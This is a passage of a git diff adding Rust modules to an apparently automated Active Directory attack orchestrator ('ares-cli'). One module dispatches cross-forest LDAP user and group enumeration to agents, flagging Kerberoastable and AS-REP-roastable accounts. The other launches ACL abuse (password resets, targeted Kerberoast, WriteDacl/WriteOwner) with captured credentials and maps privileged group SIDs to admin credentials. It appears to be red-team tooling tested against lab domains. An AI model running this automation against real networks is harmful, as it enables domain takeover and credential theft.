+ "Also report users with DoesNotRequirePreAuth as vulnerabilities with ",
+ "vuln_type='asrep_roastable', and users with SPNs as vuln_type='kerberoastable'."
+ ),
+ });
+ if let Some(bind_domain) =
+ bind_domain_for_cross_forest(&item.credential.domain, &item.domain)
+ {
+ user_payload["bind_domain"] = json!(bind_domain);
+ }
+
+ let priority = dispatcher.effective_priority("cross_forest_enum");
+ match dispatcher
+ .throttled_submit("recon", "recon", user_payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ cred_user = %item.credential.username,
+ cred_domain = %item.credential.domain,
+ under_enumerated = item.is_under_enumerated,
+ "Cross-forest user enumeration dispatched"
+ );
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "Cross-forest user enum deferred");
+ continue; // Don't mark as processed if deferred
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch cross-forest user enum");
+ continue;
+ }
+ }
+
+ // Also dispatch group enumeration for the same domain
+ let mut group_payload = json!({
+ "technique": "ldap_group_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "filters": ["(objectCategory=group)"],
+ "attributes": [
+ "sAMAccountName", "member", "memberOf", "managedBy",
+ "groupType", "objectSid", "description"
+ ],
+ "enumerate_members": true,
+ "resolve_foreign_principals": true,
+ "cross_forest": true,
+ "instructions": concat!(
+ "Enumerate ALL security groups in this domain and their members. ",
+ "Resolve Foreign Security Principals to their source domain. ",
+ "Report group name, type (Global/DomainLocal/Universal), members, ",
+ "and managed-by. This is critical for mapping cross-domain attack paths.\n\n",
+ "IMPORTANT: For each user found in any group, include them in the ",
+ "discovered_users array with EXACTLY this JSON format:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+ "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}"
+ ),
+ });
+ if let Some(bind_domain) =
+ bind_domain_for_cross_forest(&item.credential.domain, &item.domain)
+ {
+ group_payload["bind_domain"] = json!(bind_domain);
+ }
+
+ let group_priority = dispatcher.effective_priority("group_enumeration");
+ if let Ok(Some(task_id)) = dispatcher
+ .throttled_submit("recon", "recon", group_payload, group_priority)
+ .await
+ {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ "Cross-forest group enumeration dispatched"
+ );
+ }
+
+ // Mark as processed
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_CROSS_FOREST_ENUM, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_CROSS_FOREST_ENUM, &item.dedup_key)
+ .await;
+ }
+ }
+}
+
+struct CrossForestWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+ is_under_enumerated: bool,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn is_cross_forest_same_domain() {
+ assert!(!is_cross_forest("contoso.local", "contoso.local"));
+ }
+
+ #[test]
+ fn is_cross_forest_child_domain() {
+ assert!(!is_cross_forest("child.contoso.local", "contoso.local"));
+ }
+
+ #[test]
+ fn is_cross_forest_parent_domain() {
+ assert!(!is_cross_forest("contoso.local", "child.contoso.local"));
+ }
+
+ #[test]
+ fn is_cross_forest_different_forests() {
+ assert!(is_cross_forest("contoso.local", "fabrikam.local"));
+ }
+
+ #[test]
+ fn is_cross_forest_case_insensitive() {
+ assert!(!is_cross_forest("CONTOSO.LOCAL", "contoso.local"));
+ assert!(is_cross_forest("CONTOSO.LOCAL", "fabrikam.local"));
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = cross_forest_dedup_key("fabrikam.local", "Admin", "CONTOSO.LOCAL");
+ assert_eq!(key, "xforest:fabrikam.local:admin@contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_case_insensitive() {
+ let k1 = cross_forest_dedup_key("FABRIKAM.LOCAL", "Admin", "contoso.local");
+ let k2 = cross_forest_dedup_key("fabrikam.local", "admin", "CONTOSO.LOCAL");
+ assert_eq!(k1, k2);
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_CROSS_FOREST_ENUM, "cross_forest_enum");
+ }
+
+ #[test]
+ fn bind_domain_added_for_foreign_forest() {
+ assert_eq!(
+ bind_domain_for_cross_forest("contoso.local", "fabrikam.local"),
+ Some("contoso.local".to_string())
+ );
+ }
+
+ #[test]
+ fn bind_domain_omitted_for_same_domain() {
+ assert_eq!(
+ bind_domain_for_cross_forest("contoso.local", "contoso.local"),
+ None
+ );
+ }
+
+ #[test]
+ fn bind_domain_omitted_when_credential_domain_empty() {
+ assert_eq!(bind_domain_for_cross_forest("", "fabrikam.local"), None);
+ }
+
+ #[test]
+ fn is_cross_forest_empty_strings() {
+ // Empty strings are equal (same empty domain)
+ assert!(!is_cross_forest("", ""));
+ }
+
+ #[test]
+ fn is_cross_forest_one_empty() {
+ assert!(is_cross_forest("contoso.local", ""));
+ assert!(is_cross_forest("", "contoso.local"));
+ }
+
+ #[test]
+ fn is_cross_forest_deeply_nested() {
+ assert!(!is_cross_forest("a.b.contoso.local", "contoso.local"));
+ assert!(!is_cross_forest("contoso.local", "a.b.contoso.local"));
+ }
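+
+ // Sketch: the leading dot in the suffix comparison keeps lookalike
+ // domains from being treated as the same forest.
+ #[test]
+ fn is_cross_forest_lookalike_domain_not_related() {
+ assert!(is_cross_forest("notcontoso.local", "contoso.local"));
+ }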
+
+ #[test]
+ fn cross_forest_work_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: true,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = CrossForestWork {
+ dedup_key: "xforest:fabrikam.local:admin@contoso.local".into(),
+ domain: "fabrikam.local".into(),
+ dc_ip: "192.168.58.20".into(),
+ credential: cred,
+ is_under_enumerated: true,
+ };
+ assert!(work.is_under_enumerated);
+ assert_eq!(work.domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn user_enum_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "ldap_user_enumeration",
+ "target_ip": "192.168.58.20",
+ "domain": "fabrikam.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ "cross_forest": true,
+ });
+ assert_eq!(payload["technique"], "ldap_user_enumeration");
+ assert!(payload["cross_forest"].as_bool().unwrap());
+ assert_eq!(payload["domain"], "fabrikam.local");
+ }
+
+ #[test]
+ fn group_enum_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "ldap_group_enumeration",
+ "target_ip": "192.168.58.20",
+ "domain": "fabrikam.local",
+ "resolve_foreign_principals": true,
+ "cross_forest": true,
+ });
+ assert_eq!(payload["technique"], "ldap_group_enumeration");
+ assert!(payload["resolve_foreign_principals"].as_bool().unwrap());
+ }
+
+ #[test]
+ fn coverage_threshold_values() {
+ // Module uses: known_user_count >= 5 || known_hash_count >= 10
+ let known_user_count = 4;
+ let known_hash_count = 9;
+ assert!(known_user_count < 5 && known_hash_count < 10); // should trigger enum
+
+ let known_user_count2 = 5;
+ assert!(known_user_count2 >= 5); // should skip
+
+ let known_hash_count2 = 10;
+ assert!(known_hash_count2 >= 10); // should skip
+ }
+
+ #[test]
+ fn under_enumerated_threshold() {
+ // is_under_enumerated = known_user_count < 3
+ let counts = [0_usize, 2, 3, 5];
+ assert!(counts[0] < 3); // 0 users = under-enumerated
+ assert!(counts[1] < 3); // 2 users = under-enumerated
+ assert!(counts[2] >= 3); // 3 users = not under-enumerated
+ assert!(counts[3] >= 3); // 5 users = not under-enumerated
+ }
+
+ // --- collect_cross_forest_work tests ---
+
+ fn make_cred(
+ id: &str,
+ user: &str,
+ pass: &str,
+ domain: &str,
+ admin: bool,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: id.into(),
+ username: user.into(),
+ password: pass.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: admin,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_hash(user: &str, domain: &str) -> ares_core::models::Hash {
+ ares_core::models::Hash {
+ id: format!("h-{user}"),
+ username: user.into(),
+ hash_value: "aad3b435b51404eeaad3b435b51404ee:deadbeef".into(),
+ hash_type: "ntlm".into(),
+ domain: domain.into(),
+ cracked_password: None,
+ source: "test".into(),
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ aes_key: None,
+ }
+ }
+
+ #[tokio::test]
+ async fn collect_empty_state_no_work() {
+ let state = SharedState::new("test".into());
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_single_domain_no_work() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.credentials.push(make_cred(
+ "c1",
+ "user1",
+ "P@ssw0rd!",
+ "contoso.local",
+ false,
+ )); // pragma: allowlist secret
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(work.is_empty(), "single domain should produce no work");
+ }
+
+ #[tokio::test]
+ async fn collect_no_credentials_no_work() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(work.is_empty(), "no credentials should produce no work");
+ }
+
+ #[tokio::test]
+ async fn collect_two_domains_with_cross_forest_cred() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ s.credentials
+ .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ // Should produce work for both domains (the cred works for contoso as same-domain,
+ // and for fabrikam as cross-forest).
+ assert!(!work.is_empty());
+ // At least one item should target fabrikam
+ assert!(work.iter().any(|w| w.domain == "fabrikam.local"));
+ }
+
+ #[tokio::test]
+ async fn collect_skips_domain_with_five_credentials() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // 5 credentials for fabrikam = already enumerated
+ for i in 0..5 {
+ s.credentials.push(make_cred(
+ &format!("c{i}"),
+ &format!("user{i}"),
+ "P@ssw0rd!", // pragma: allowlist secret
+ "fabrikam.local",
+ false,
+ ));
+ }
+ // Also need a cred that can authenticate
+ s.credentials
+ .push(make_cred("cx", "admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ // fabrikam should be skipped (>= 5 creds), contoso should appear
+ assert!(
+ work.iter().all(|w| w.domain != "fabrikam.local"),
+ "domain with >= 5 credentials should be skipped"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_skips_domain_with_ten_hashes() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // 10 hashes for fabrikam
+ for i in 0..10 {
+ s.hashes
+ .push(make_hash(&format!("hashuser{i}"), "fabrikam.local"));
+ }
+ s.credentials
+ .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(
+ work.iter().all(|w| w.domain != "fabrikam.local"),
+ "domain with >= 10 hashes should be skipped"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_credential_priority_same_domain_best() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Cross-forest cred (priority 3)
+ s.credentials.push(make_cred(
+ "c1",
+ "crossuser",
+ "P@ssw0rd!",
+ "contoso.local",
+ false,
+ )); // pragma: allowlist secret
+ // Same-domain cred (priority 0) — should be selected
+ s.credentials.push(make_cred(
+ "c2",
+ "localuser",
+ "P@ssw0rd!",
+ "fabrikam.local",
+ false,
+ )); // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ let fab_work = work.iter().find(|w| w.domain == "fabrikam.local");
+ assert!(fab_work.is_some(), "should produce work for fabrikam");
+ assert_eq!(
+ fab_work.unwrap().credential.username,
+ "localuser",
+ "same-domain credential should be preferred"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_credential_priority_admin_over_same_forest() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Same-forest non-admin (priority 2)
+ s.credentials.push(make_cred(
+ "c1",
+ "forestuser",
+ "P@ssw0rd!",
+ "child.fabrikam.local",
+ false,
+ )); // pragma: allowlist secret
+ // Admin from another domain (priority 1) — should win
+ s.credentials.push(make_cred(
+ "c2",
+ "adminuser",
+ "P@ssw0rd!",
+ "contoso.local",
+ true,
+ )); // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ let fab_work = work.iter().find(|w| w.domain == "fabrikam.local");
+ assert!(fab_work.is_some());
+ assert_eq!(
+ fab_work.unwrap().credential.username,
+ "adminuser",
+ "admin credential should be preferred over same-forest non-admin"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_credential_priority_same_forest_over_cross_forest() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Cross-forest non-admin (priority 3)
+ s.credentials.push(make_cred(
+ "c1",
+ "crossuser",
+ "P@ssw0rd!",
+ "contoso.local",
+ false,
+ )); // pragma: allowlist secret
+ // Same-forest non-admin (priority 2) — should win
+ s.credentials.push(make_cred(
+ "c2",
+ "forestuser",
+ "P@ssw0rd!",
+ "child.fabrikam.local",
+ false,
+ )); // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ let fab_work = work.iter().find(|w| w.domain == "fabrikam.local");
+ assert!(fab_work.is_some());
+ assert_eq!(
+ fab_work.unwrap().credential.username,
+ "forestuser",
+ "same-forest credential should be preferred over cross-forest"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_skips_quarantined_credentials() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Only credential is quarantined
+ s.credentials.push(make_cred(
+ "c1",
+ "baduser",
+ "P@ssw0rd!",
+ "contoso.local",
+ true,
+ )); // pragma: allowlist secret
+ s.quarantined_credentials.insert(
+ "baduser@contoso.local".into(),
+ chrono::Utc::now() + chrono::Duration::seconds(300),
+ );
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(
+ work.iter().all(|w| w.credential.username != "baduser"),
+ "quarantined credentials should be skipped"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_skips_empty_password_credentials() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Only credential has empty password
+ s.credentials
+ .push(make_cred("c1", "nopass", "", "contoso.local", true));
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ // No usable credential → should produce no work for fabrikam
+ assert!(
+ work.iter().all(|w| w.domain != "fabrikam.local"),
+ "empty password credentials should not produce work"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_skips_already_processed_dedup_key() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ s.credentials
+ .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret
+ // Pre-mark the dedup key as processed
+ let key = cross_forest_dedup_key("fabrikam.local", "admin", "contoso.local");
+ s.mark_processed(DEDUP_CROSS_FOREST_ENUM, key);
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(
+ work.iter().all(|w| w.domain != "fabrikam.local"),
+ "already-processed dedup key should be skipped"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_under_enumerated_flag_when_few_users() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // 2 fabrikam creds (< 3 = under-enumerated)
+ s.credentials.push(make_cred(
+ "c1",
+ "user1",
+ "P@ssw0rd!",
+ "fabrikam.local",
+ false,
+ )); // pragma: allowlist secret
+ s.credentials.push(make_cred(
+ "c2",
+ "user2",
+ "P@ssw0rd!",
+ "fabrikam.local",
+ false,
+ )); // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ let fab_work = work.iter().find(|w| w.domain == "fabrikam.local");
+ assert!(fab_work.is_some());
+ assert!(
+ fab_work.unwrap().is_under_enumerated,
+ "domain with < 3 users should be marked under-enumerated"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_not_under_enumerated_with_three_users() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // 3 fabrikam creds (>= 3 = not under-enumerated, but < 5 so still triggers enum)
+ for i in 0..3 {
+ s.credentials.push(make_cred(
+ &format!("c{i}"),
+ &format!("user{i}"),
+ "P@ssw0rd!", // pragma: allowlist secret
+ "fabrikam.local",
+ false,
+ ));
+ }
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ let fab_work = work.iter().find(|w| w.domain == "fabrikam.local");
+ assert!(fab_work.is_some());
+ assert!(
+ !fab_work.unwrap().is_under_enumerated,
+ "domain with >= 3 users should not be marked under-enumerated"
+ );
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/dacl_abuse.rs b/ares-cli/src/orchestrator/automation/dacl_abuse.rs
new file mode 100644
index 00000000..dbc40d05
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/dacl_abuse.rs
@@ -0,0 +1,1192 @@
+//! auto_dacl_abuse -- direct ACL abuse for known attack paths.
+//!
+//! Unlike acl_chain_follow (which requires BloodHound to populate acl_chains),
+//! this module proactively dispatches known ACL abuse techniques when:
+//! - A credential is available for a user known to have dangerous permissions
+//! - The target object exists in the domain
+//!
+//! Covers: ForceChangePassword, GenericWrite (targeted Kerberoast), WriteDacl,
+//! WriteOwner, GenericAll. Each abuse type maps to a specific tool invocation
+//! (e.g., net rpc password for ForceChangePassword, bloodyAD for GenericWrite).
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::dedup::is_ghost_machine_account;
+use crate::orchestrator::dispatcher::{Dispatcher, SubmissionOutcome};
+use crate::orchestrator::state::*;
+
+/// Dispatches ACL abuse when matching credentials + bloodhound paths exist.
+/// Interval: 30s.
+pub async fn auto_dacl_abuse(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("dacl_abuse") {
+ continue;
+ }
+
+ let work: Vec<DaclWork> = {
+ let state = dispatcher.state.read().await;
+ collect_dacl_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "dacl_abuse",
+ "acl_type": item.vuln_type,
+ "vuln_id": item.vuln_id,
+ "source_user": item.source_user,
+ "target_user": item.target_user,
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("dacl_abuse");
+ // Mark dedup on Submitted OR Deferred to prevent the 30s tick from
+ // re-emitting identical work each cycle and bloating the deferred
+ // ZSET past its per-type cap (which silently drops entries). Only
+ // skip dedup on Dropped — those need to be reconsidered next tick.
+ let mark_dedup = match dispatcher
+ .throttled_submit_outcome("acl_chain_step", "acl", payload, priority)
+ .await
+ {
+ Ok(SubmissionOutcome::Submitted(task_id)) => {
+ info!(
+ task_id = %task_id,
+ vuln_id = %item.vuln_id,
+ acl_type = %item.vuln_type,
+ source = %item.source_user,
+ target = %item.target_user,
+ "DACL abuse dispatched"
+ );
+ true
+ }
+ Ok(SubmissionOutcome::Deferred) => {
+ debug!(vuln_id = %item.vuln_id, "DACL abuse deferred (will retry via deferred drain)");
+ true
+ }
+ Ok(SubmissionOutcome::Dropped) => {
+ debug!(vuln_id = %item.vuln_id, "DACL abuse dropped (will reconsider next tick)");
+ false
+ }
+ Err(e) => {
+ warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch DACL abuse");
+ false
+ }
+ };
+ if mark_dedup {
+ {
+ let mut state = dispatcher.state.write().await;
+ state.mark_processed(DEDUP_DACL_ABUSE, item.dedup_key.clone());
+ }
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_DACL_ABUSE, &item.dedup_key)
+ .await;
+ }
+ }
+ }
+}
+
+/// Collect DACL abuse work items from state without holding async locks.
+///
+/// Extracted for testability: scans `discovered_vulnerabilities` for ACL-type
+/// vulns that have a matching credential and haven't been processed yet.
+fn collect_dacl_work(state: &StateInner) -> Vec<DaclWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ // Check discovered_vulnerabilities for ACL-related vulns
+ // (populated by BloodHound analysis or recon agents)
+ for vuln in state.discovered_vulnerabilities.values() {
+ let vtype = vuln.vuln_type.to_lowercase();
+
+ let is_acl_vuln = vtype.contains("forcechangepassword")
+ || vtype.contains("genericwrite")
+ || vtype.contains("writedacl")
+ || vtype.contains("writeowner")
+ || vtype.contains("genericall")
+ || vtype.contains("self_membership")
+ || vtype.contains("write_membership")
+ || vtype.contains("writeproperty")
+ || vtype.contains("allextendedrights")
+ || vtype.contains("addmember")
+ || vtype.contains("addself");
+
+ if !is_acl_vuln {
+ continue;
+ }
+
+ if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+ continue;
+ }
+
+ let dedup_key = format!("dacl:{}", vuln.vuln_id);
+ if state.is_processed(DEDUP_DACL_ABUSE, &dedup_key) {
+ continue;
+ }
+
+ let target_name = vuln
+ .details
+ .get("target")
+ .or_else(|| vuln.details.get("target_user"))
+ .or_else(|| vuln.details.get("to"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+ if is_ghost_machine_account(target_name) {
+ debug!(
+ vuln_id = %vuln.vuln_id,
+ target = %target_name,
+ "Skipping ACL abuse for ghost machine account target"
+ );
+ continue;
+ }
+
+ // Extract source user from vuln details
+ let source_user = vuln
+ .details
+ .get("source")
+ .or_else(|| vuln.details.get("source_user"))
+ .or_else(|| vuln.details.get("from"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+
+ let source_domain = vuln
+ .details
+ .get("source_domain")
+ .or_else(|| vuln.details.get("domain"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("");
+
+ if source_user.is_empty() {
+ continue;
+ }
+
+ // Find matching credential.
+ //
+ // BloodHound often emits ACL edges with SID principals (e.g. for
+ // well-known groups like Enterprise Admins). When `source` is a SID,
+ // resolve to any privileged credential in the source's domain so the
+ // ACL chain can still be exercised.
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| {
+ c.username.to_lowercase() == source_user.to_lowercase()
+ && (source_domain.is_empty()
+ || c.domain.to_lowercase() == source_domain.to_lowercase())
+ })
+ .cloned()
+ .or_else(|| resolve_sid_principal(state, source_user, source_domain));
+
+ if let Some(cred) = cred {
+ let target_user = vuln
+ .details
+ .get("target")
+ .or_else(|| vuln.details.get("target_user"))
+ .or_else(|| vuln.details.get("to"))
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+
+ let dc_ip = state
+ .domain_controllers
+ .get(&cred.domain.to_lowercase())
+ .cloned()
+ .unwrap_or_default();
+
+ // When BloodHound emitted the source as a raw SID and we resolved
+ // it via `resolve_sid_principal`, surface the resolved credential's
+ // SAM account name as `source_user` — not the SID. Tool schemas
+ // require a username for credential injection by `(user, domain)`,
+ // and the LLM otherwise echoes the SID as the auth principal.
+ let dispatched_source_user = if source_user.starts_with("S-1-5-21-") {
+ cred.username.clone()
+ } else {
+ source_user.to_string()
+ };
+
+ items.push(DaclWork {
+ dedup_key,
+ vuln_id: vuln.vuln_id.clone(),
+ vuln_type: vtype,
+ source_user: dispatched_source_user,
+ target_user,
+ domain: cred.domain.clone(),
+ dc_ip,
+ credential: cred,
+ });
+ }
+ }
+
+ items
+}
+
+struct DaclWork {
+ dedup_key: String,
+ vuln_id: String,
+ vuln_type: String,
+ source_user: String,
+ target_user: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+/// RIDs of well-known privileged groups whose membership is owned by privileged
+/// credentials in the same domain. Resolving a SID-typed source to "any DA-cred
+/// in this domain" is correct for these RIDs because the abuse only requires
+/// *a* member of the group, not a specific principal.
+fn is_privileged_well_known_rid(rid: u32) -> bool {
+ matches!(
+ rid,
+ 512 // Domain Admins
+ | 518 // Schema Admins
+ | 519 // Enterprise Admins
+ | 520 // Group Policy Creator Owners
+ | 526 // Key Admins
+ | 527 // Enterprise Key Admins
+ )
+}
+
+/// When the ACL edge source is a SID (typically a well-known group), resolve
+/// it to a credential of an actual member.
+///
+/// Strategy:
+/// 1. Parse `S-1-5-21-X-Y-Z-RID` and extract the domain SID prefix and RID.
+/// 2. Reverse-look up the domain via `state.domain_sids` (or fall back to
+/// `source_domain` from the vuln details).
+/// 3. For privileged well-known RIDs, return any `is_admin` credential in
+/// that domain. As a last resort, return any credential in the domain.
+fn resolve_sid_principal(
+ state: &StateInner,
+ source: &str,
+ source_domain: &str,
+) -> Option<ares_core::models::Credential> {
+ if !source.starts_with("S-1-5-21-") {
+ return None;
+ }
+ let (prefix, rid_str) = source.rsplit_once('-')?;
+ let rid: u32 = rid_str.parse().ok()?;
+
+ let resolved_domain = state
+ .domain_sids
+ .iter()
+ .find(|(_, sid)| sid.eq_ignore_ascii_case(prefix))
+ .map(|(d, _)| d.to_lowercase())
+ .or_else(|| {
+ if source_domain.is_empty() {
+ None
+ } else {
+ Some(source_domain.to_lowercase())
+ }
+ })?;
+
+ if !is_privileged_well_known_rid(rid) {
+ return None;
+ }
+
+ let admin = state
+ .credentials
+ .iter()
+ .find(|c| c.is_admin && c.domain.to_lowercase() == resolved_domain)
+ .cloned();
+ if admin.is_some() {
+ return admin;
+ }
+
+ state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == resolved_domain)
+ .cloned()
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("dacl:{}", "vuln-acl-001");
+ assert_eq!(key, "dacl:vuln-acl-001");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_DACL_ABUSE, "dacl_abuse");
+ }
+
+ #[test]
+ fn acl_vuln_type_matching() {
+ let positives = [
+ "ForceChangePassword",
+ "GenericWrite",
+ "WriteDacl",
+ "WriteOwner",
+ "GenericAll",
+ "self_membership",
+ "write_membership",
+ "WriteProperty",
+ "AllExtendedRights",
+ "AddMember",
+ "AddSelf",
+ "SomePrefix_forcechangepassword_suffix",
+ ];
+ for t in &positives {
+ let vtype = t.to_lowercase();
+ let is_acl_vuln = vtype.contains("forcechangepassword")
+ || vtype.contains("genericwrite")
+ || vtype.contains("writedacl")
+ || vtype.contains("writeowner")
+ || vtype.contains("genericall")
